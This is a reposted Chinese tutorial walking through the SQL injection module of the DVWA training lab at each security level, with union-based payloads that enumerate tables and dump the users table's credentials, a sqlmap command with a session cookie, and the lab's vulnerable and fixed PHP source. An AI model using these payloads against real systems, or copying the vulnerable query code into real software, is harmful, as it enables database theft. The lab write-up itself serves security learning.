当前位置:   article > 正文

dvwa靶场SQL Injection(sql注入)全难度教程(附代码分析)_sqlmap注入dvwa靶场

sqlmap注入dvwa靶场

SQL Injection(Security Level: low)

手工注入

1'

发现注入点

1' or 1=1 #

 判断回显(因该是2或者3)

1' union select 123 #

 报错了那就是2了

1' union select 12 #

查询版本和数据库名

-1' union select database(),version() #

 

直接能用schema了

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

 一看就知道要对users下手

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

直接关注到user和password

-1' union select 1,group_concat(user,password) from users #

 ok拿下,但是密码是md5加密了

自动化脚本

先找到cookie(该网站有token和cookie)(抓个包就能看出来)

 进入sqlmap就可以

sqlmap -u "http://192.168.21.149/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=9i79dn4ugiv0vc6gm25352at83" --batch

接下来和sqli-labs的过程一样了。 

SQL Injection(Security Level: medium)

手工注入

 可以抓包进行修改。

 这个就和前面是一样的了。

代码分析

  1. <?php
  2. if( isset( $_POST[ 'Submit' ] ) ) {
  3. // Get input
  4. $id = $_POST[ 'id' ];
  5. $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
  6. // Check database
  7. $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
  8. $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
  9. // Get results
  10. while( $row = mysqli_fetch_assoc( $result ) ) {
  11. // Display values
  12. $first = $row["first_name"];
  13. $last = $row["last_name"];
  14. // Feedback for end user
  15. echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
  16. }
  17. //mysql_close();
  18. }
  19. ?>

只是对\x00,\n,\r,\,',",\x1a转义了

SQL Injection(Security Level: high)

返回结果输出在原来的界面上,其他同Low。

 代码分析

  1. <?php
  2. if( isset( $_SESSION [ 'id' ] ) ) {
  3. // Get input
  4. $id = $_SESSION[ 'id' ];
  5. // Check database
  6. $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
  7. $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
  8. // Get results
  9. while( $row = mysqli_fetch_assoc( $result ) ) {
  10. // Get values
  11. $first = $row["first_name"];
  12. $last = $row["last_name"];
  13. // Feedback for end user
  14. echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
  15. }
  16. ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
  17. }
  18. ?>

只是有一个limit1限制,其实对我的攻击方法没有影响。

SQL Injection(Security Level: impossible)

  1. <?php
  2. if( isset( $_GET[ 'Submit' ] ) ) {
  3. // Check Anti-CSRF token
  4. checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
  5. // Get input
  6. $id = $_GET[ 'id' ];
  7. // Was a number entered?
  8. if(is_numeric( $id )) {
  9. // Check the database
  10. $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
  11. $data->bindParam( ':id', $id, PDO::PARAM_INT );
  12. $data->execute();
  13. $row = $data->fetch();
  14. // Make sure only 1 result is returned
  15. if( $data->rowCount() == 1 ) {
  16. // Get values
  17. $first = $row[ 'first_name' ];
  18. $last = $row[ 'last_name' ];
  19. // Feedback for end user
  20. echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
  21. }
  22. }
  23. }
  24. // Generate Anti-CSRF token
  25. generateSessionToken();
  26. ?>

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/267495
推荐阅读
相关标签
  

闽ICP备14008679号